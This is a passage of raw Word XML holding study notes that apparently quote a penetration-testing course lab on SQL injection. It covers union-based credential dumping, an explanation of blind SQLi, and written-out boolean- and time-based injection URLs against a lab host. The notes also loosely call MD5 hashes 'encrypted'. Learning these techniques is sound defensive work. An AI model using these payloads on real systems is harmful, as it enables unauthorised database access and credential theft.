          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This gets columns from specific table (here it's the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">users </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">table</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016F2">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Using the above statement, we'll again attempt to store the output of the username, password, and description in the web application table.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016F3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1041400"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr descr="Figure 15: Dumping Users Credentials" id="545" name="image531.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="Figure 15: Dumping Users Credentials" id="0" name="image531.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId462"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1041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6F4">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Great! Our UNION-based payload was able to fetch the usernames and MD5 hashes of the entire users table, including an administrative account. These</w:t>
      </w:r>
      <w:hyperlink r:id="rId463">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId464">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">MD5</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> values are encrypted versions of the plain-text passwords, which can be reversed using appropriate tools.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016F5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016F6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016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6F8">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_lbqwrktvisf" w:id="188"/>
      <w:bookmarkEnd w:id="188"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Blind SQL Injections (opposite of in-band)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016F9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016FA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From XXXXXXXXX (10.2.3. Blind SQL Injections):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016FB">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The SQLi payloads we have encountered are </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">in-band</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, meaning we're able to retrieve the database content of our query inside the web application. This is because in-band means the web application </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">provides the result of the query along with the application-returned value</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016FC">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Alternatively, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">blind</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> SQL injections</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> describe scenarios in which database responses are never returned and behavior is inferred using either boolean- or time-based logic.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016FD">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">As an example, generic boolean-based blind SQL injections cause the application to return different and predictable values whenever the database query returns a TRUE or FALSE result, hence the "boolean" name. These values can be reviewed within the application context.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016FE">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Although "boolean-based" might not seem like a blind SQLi variant, the output used to infer results comes from the web application, not the database itself.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016FF">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Time-based blind SQL injections infer the query results by instructing the database to wait for a specified amount of time. Based on the response time, the attacker can conclude if the statement is TRUE or FALSE.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001700">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Our vulnerable application (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http://192.168.50.16/blindsqli.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) includes a code portion affected by both types of blind SQL injection vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001701">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Once we have logged in with the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">offsec</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">lab</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> credentials, we'll encounter the following page:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001702">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3784600"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr descr="Figure 16: Testing for Blind SQLi" id="328" name="image333.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="Figure 16: Testing for Blind SQLi" id="0" name="image333.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId465"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3784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703">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Closely reviewing the URL, we'll notice that the application takes a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">user</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> parameter as input, defaulting to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">offsec</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> since this is our current logged-in user. The application then queries the user's record, returning the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Username</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Password Hash</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Description</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> values.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001704">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To test for boolean-based SQLi, we can try to append the below payload to the URL:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001705">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http://192.168.50.16/blindsqli.php?user=offsec' AND 1=1 -- //</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001706">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="768"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This tests for boolean-based SQLi since </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1=1</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> will always be TRUE; the application will return the values only if the user is present in the database</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001707">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Using this syntax, we could enumerate the entire database for other usernames or even extend our SQL query to verify data in other tables.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001708">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can achieve the same result by using a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">time-based </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SQLi payload:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001709">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http://192.168.50.16/blindsqli.php?user=offsec' AND IF (1=1, sleep(3),'false') -- //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000170A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1093"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">IF(condition, true_case, false_case) is a MySQL function that works like a ternary:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000170B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1093"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If condition is true → execute true_case</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000170C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1093"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Else → execute false_case</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000170D">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In this case, we appended an IF condition that will always be true inside the statement itself but will return false if the user is non-existent.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000170E">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We know the user </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">offsec</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is active, so we if paste the above URL payload into our Kali VM's browser, we'll notice that the application hangs for about three seconds.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000170F">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">When dealing with blind SQL injections, it is always recommended to probe the application's behavior for both valid and erroneous responses. In this case, we aim to experiment by sending a fictitious username and verifying the response against a valid one, such as the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">offsec</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> user.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001710">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This attack angle can become very time-consuming, so it's often automated with tools like </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlmap</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, as we'll cover in the next Learning Unit.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001711">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000171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13">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_wwl998ganxwo" w:id="189"/>
      <w:bookmarkEnd w:id="189"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to test for SQL injection for Blind SQL injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001714">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">A great resource for this is </w:t>
      </w:r>
      <w:hyperlink r:id="rId466">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">PortSwigger SQL cheatsheet</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:hyperlink r:id="rId467">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
